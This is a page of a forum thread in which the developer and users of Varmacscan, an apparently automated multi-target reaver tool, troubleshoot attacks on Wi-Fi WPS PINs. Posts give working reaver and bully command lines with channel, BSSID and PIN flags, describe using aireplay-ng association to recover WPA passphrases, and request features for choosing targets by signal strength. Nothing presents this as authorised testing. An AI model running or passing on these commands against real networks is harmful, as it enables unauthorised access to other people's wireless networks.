Page 2 of 7 FirstFirst 1234 ... LastLast
Results 11 to 20 of 65

Thread: Varmacscan2-0 an automatic multi-target reaver attack tool released

  1. #11
    Senior Member
    Join Date
    Jul 2013
    Posts
    800
    To brunoaduarte

    Thanks again for your input

    MTeams has been running tests on version 2-4 with three(3) computers running both kali 2.0 and 1.10a in both harddrive and persistent usb installs. In only one(1) case did reaver not get the WPA key. We think the problem is with output from tee.

    We are considering dumping xterm and trying Eterm as it is now available thru kali.

    To Laserman75

    MTeams has never tried association thru aireplay-ng. What a nice idea. As you have reported it works better we will give it a try and add for you a module allowing a association choice in the dropdown menus. However we do run aireplay-ng -1 alot with VMR-MDK without the -A in the reaver command line because there is no way to keep aireplay-ng functioning if it does not get a response which would in turn kill reaver function. Please comment on this point.

    We are aware of the hidden ssid matter as this option was coded into VMR-MDK at users request. However varmacscan is really just a scanner - and uses the bssid not the essid so if wash then gives the name as (null) the program would use that as the essid. We cannot test this as we have no hidden essid targets. If you have such please test this.


    MTeams
    Last edited by mmusket33; 2015-11-30 at 09:09 AM.

  2. #12
    Member
    Join Date
    Nov 2015
    Posts
    45
    Ok mmusket33, it seems to happen more often here, i've got 6 pins and no WPA.

    I though the problem would be the same related in this link: https://code.google.com/p/reaver-wps/issues/detail?id=203 (Issue 203: Reaver finds PIN but not passphrase)

    So i tried to use "bully" to crack the WPA and it worked !

    "bully -b XX:XX:XX:XX:XX:XX -c 3 -B -v 2 -p 20863463"

    Maybe another solution, would be to auto run bully instead of reaver at line 695, after wps pin is found...

    Code:
    xterm -g 80x15-1+100 -T "reaver pin= $WPSPIN" -e "reaver -i $monitor -a -f -c $channel -b $bssid -r 2:15 -L -E -vvv -N -T 1 -t 20 -d 0 -x 30 --pin=$WPSPIN --mac=$VARMAC --session tmp/$bssid  2>&1 | tee VARMAC_LOGS/$bssid-$ssid-$DATEFILE-$PAD" &
    BTW: There's a small bug at line 708 of "varmacscan2-0.sh"

    Code:
    [+] echo -e " Standby while all ESSID Probe Data from airodump-ng is processed...."
    should be

    Code:
    echo -e "[+] Standby while all ESSID Probe Data from airodump-ng is processed...."
    Last edited by brunoaduarte; 2015-11-30 at 05:24 PM.

  3. #13
    Senior Member
    Join Date
    Jul 2013
    Posts
    800
    To: brunoaduarte

    MTeams has tried to duplicate and only found one instance where reaver did not write the WPA key to the log file. Again we think tee is terminating the process before reaver can write the file.

    We are just coding in the -A request by Laserman75 as we speak.

    MTeam

  4. #14
    Member
    Join Date
    Nov 2015
    Posts
    45
    mmusket33,

    As now i have the wps pin code, i manually loaded reaver (same line that is executed by varmacscan):

    Code:
    reaver -i wlan0mon -a -f -c 10 -b XX:XX:XX:XX:XX:XX -r 2:15 -L -E -vvv -N -T 1 -t 20 -d 0 -x 30 --pin=59133049
    Here's reaver output:

    http://pastebin.com/a7qJzV8t

    As you can see, no WPA key is found, so the problem really seems to be with "reaver", and not with "tee".

    FYI: varmacscan found this exact same pin 3 times, so i don't believe it's a wrong pin problem.

  5. #15
    Senior Member
    Join Date
    Jul 2013
    Posts
    800
    To brunoaduarte

    Thanks for your independent analysis. We will release version 2.6 within 24 hours as the program has been running on three computers both kali1.1 and 2.0. We switched to Eterm but could not get it to run under kali2.0 so we restored xterm. Furthermore Laserman75's idea of using aireplay-ng and -A with reaver seems to work as it cracked one network that had never even responded to a reaver pin request in over a year.

    Again Thanks

    MTeams

  6. #16
    Junior Member
    Join Date
    Aug 2015
    Posts
    5
    Which network did laserman got it worked?
    Which router model?
    Please specify it

  7. #17
    Member
    Join Date
    Nov 2015
    Posts
    45
    Nice mmusket33,

    Hoping to see the new version of your script... also i'll try to use aireplay-ng auth here and see if i can crack the wpa passphrase.

    Btw, could you remove those confirmation (for every action there's a confirmation) texts from varmacscan2-0.sh ?

    Other features that would be cool to have:
    - Ignore low signal APs
    - Attack by signal level (start with stronger signal AP)
    Last edited by brunoaduarte; 2015-12-03 at 04:39 AM.

  8. #18
    Junior Member
    Join Date
    Apr 2015
    Posts
    29
    Quote Originally Posted by brunoaduarte View Post
    Nice mmusket33,

    Hoping to see the new version of your script... also i'll try to use aireplay-ng auth here and see if i can crack the wpa passphrase.
    No aireplay-ng auth is only there in order not to carry out the association with Reaver, because this fails for some routers.
    This has not to do with the WPA passphrase.

    @mmusket33
    I hope that soon the new version available for testing

  9. #19
    Member
    Join Date
    Nov 2015
    Posts
    45
    Quote Originally Posted by Laserman75 View Post
    No aireplay-ng auth is only there in order not to carry out the association with Reaver, because this fails for some routers.
    This has not to do with the WPA passphrase.
    Yeah Laserman75, i know aireplay-ng will not crack the WPA pass. What i meant is that i was going to try aireplay-ng to make the auth/association process for reaver (reaver -A flag), because i was having some problems cracking the WPA pass after pin code was found (reaver only found wps pin, and no wpa pass) as you can see in my last log...

    Anyway, your idea worked ! Not with reaver, but with "bully"...

    I started aireplay-ng auth/association and started bully with fixed pincode, wpa passphrase was recovered in seconds.

    Thanks !
    Last edited by brunoaduarte; 2015-12-03 at 04:28 AM.

  10. #20
    Junior Member
    Join Date
    Apr 2015
    Posts
    29
    @brunoaduarte
    No need to thank me, you're welcome.
    Nice to hear that it works for you.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •